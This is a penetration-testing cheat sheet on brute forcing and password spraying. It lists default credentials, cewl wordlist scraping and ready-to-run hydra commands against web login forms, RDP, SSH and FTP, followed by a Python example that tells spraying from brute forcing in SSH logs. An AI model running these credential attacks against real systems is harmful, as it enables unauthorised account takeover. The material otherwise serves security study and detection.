Brute Forcing and Spraying

Common Usernames

root
admin
administrator

Common Passwords

admin
root
toor
password
Username:Username     <--- uppercase first letter
username:username     <--- lowercase first letter
AppName:AppName       <--- Test upper and lower

Scrape website for potential passwords

cewl <url>
cewl --lower <url>
cewl --upper <url>

Hydra

Login Portals

Example 1

  • Capture in Burp

  • Username and Password converted to base64 upon sending

  • Error code 403 = failed

hydra -I -f -L usernames.txt -P passwords.txt 'http-post-form://192.168.165.61:8081/service/rapture/session:username=^USER64^&password=^PASS64^:C=/:F=403'

hydra -I -vV -f -L users.txt -P passwords.txt 'http-post-form://192.168.165.61:8081/service/rapture/session:username=^USER64^&password=^PASS64^:C=/:F=403'

  • -I - ignore restore files

  • -vV - verbose mode

  • -f - stop upon success

  • -L - username list

  • -P - password list

  • ^USER64^ ^PASS64^ - placeholders for the username and password, base64-encoded

  • C=/ - establish session cookies at the URL

  • F=403 - HTTP 403 means invalid login

Example 2

hydra -l user -P /usr/share/wordlists/rockyou.txt 192.168.50.201 http-post-form "/index.php:fm_usr=user&fm_pwd=^PASS^:Login failed. Invalid"
hydra -l admin -P ~/rockyou.txt http-get://192.168.178.201 -vV

Other services

hydra -vV -L names.txt -p 'SuperS3cure1337#' 192.168.178.202 rdp -t 10
hydra -vV -l itadmin -P ~/rockyou.txt 192.168.178.202 -t 10 ssh
hydra -vV -l itadmin -P ~/rockyou.txt 192.168.178.202 -t 10 ftp
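
On the log side, the two patterns above look different: `-L names.txt -p <one password>` leaves one or two failures across many accounts (spraying), while `-l itadmin -P <wordlist>` leaves many failures against a single account (brute forcing). The Python below is an added example, not part of the original notes, that separates the two in OpenSSH "Failed password" lines. The function name, the thresholds and the sample log lines (documentation-range addresses) are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# OpenSSH failure line: "Failed password for [invalid user ]NAME from IP port N ssh2"
FAILED = re.compile(r"Failed password for (?:invalid user )?(\S+) from (\S+) port \d+")

def classify(lines, min_failures=5, spray_users=4):
    """Return {source_ip: 'spray' | 'brute-force'}; thresholds are illustrative."""
    per_source = defaultdict(lambda: defaultdict(int))  # ip -> user -> failure count
    for line in lines:
        m = FAILED.search(line)
        if m:
            user, ip = m.groups()
            per_source[ip][user] += 1
    verdicts = {}
    for ip, users in per_source.items():
        total = sum(users.values())
        if total < min_failures:
            continue  # a handful of failures is ordinary mistyping
        if len(users) >= spray_users and max(users.values()) <= 2:
            # many accounts, one or two guesses each
            verdicts[ip] = "spray"
        elif max(users.values()) >= min_failures:
            # one account hit with many guesses
            verdicts[ip] = "brute-force"
    return verdicts

def _line(sec, user, ip, invalid=False):
    tag = "invalid user " if invalid else ""
    return (f"Jan 10 12:00:{sec:02d} srv sshd[4242]: "
            f"Failed password for {tag}{user} from {ip} port 5{sec:04d} ssh2")

# Constructed sample: a spray, a brute force, one honest typo, one success.
SAMPLE = (
    [_line(i, u, "203.0.113.5", invalid=(u == "guest"))
     for i, u in enumerate(["alice", "bob", "carol", "dave", "guest"])]
    + [_line(10 + i, "itadmin", "203.0.113.9") for i in range(8)]
    + [_line(30, "alice", "203.0.113.7")]
    + ["Jan 10 12:00:40 srv sshd[4242]: Accepted password for alice "
       "from 203.0.113.7 port 50001 ssh2"]
)

if __name__ == "__main__":
    for ip, verdict in sorted(classify(SAMPLE).items()):
        print(ip, verdict)
```

A per-account lockout counter alone misses the spray case, because no single account accumulates enough failures; counting distinct usernames per source is what catches it.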
